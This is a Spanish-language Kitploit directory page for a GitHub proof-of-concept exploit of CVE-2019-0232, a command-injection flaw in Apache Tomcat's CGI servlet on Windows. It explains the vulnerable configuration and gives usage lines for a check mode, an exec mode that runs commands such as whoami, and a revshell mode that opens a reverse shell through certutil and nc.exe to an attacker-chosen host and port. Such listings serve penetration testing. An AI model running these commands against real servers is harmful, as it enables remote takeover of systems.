Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-0232 — CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit | Kitploit
Herramientas/GitHubGitHub/yuzuki-ayanami/cve-2019-0232
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubyuzuki-ayanami/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Ver Repositorio
1111hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
tomcat

CVE-2019-0232

Apache Tomcat CGIServlet enableCmdLineArguments RCE

Inyección en scripts batch de Windows mediante argumentos de la cadena de consulta

Descripción

Apache Tomcat con el servlet CGI habilitado y enableCmdLineArguments=true pasa los parámetros de la cadena de consulta como argumentos de línea de comandos a los scripts CGI. En Windows, los archivos batch (.bat/.cmd) interpretan & como separador de comandos, lo que permite la ejecución arbitraria de comandos mediante una URL manipulada.

Requisitos previos

  • Servlet CGI habilitado en conf/web.xml o WEB-INF/web.xml
  • enableCmdLineArguments=true en los init-params del servlet CGI
  • Un script CGI (por ejemplo, ism.bat) desplegado y accesible
  • Objetivo Windows (se requieren archivos batch para la inyección de &)

Uso

git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt

Comprobar si existe el endpoint CGI:

python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat

Ejecutar un comando:

python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'

Shell inversa (certutil en 2 etapas + nc.exe):

python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444

Requisitos

  • Python 3.8+
  • requests
  • Objetivo Windows (la vulnerabilidad es específica del sistema operativo)
Descargar herramienta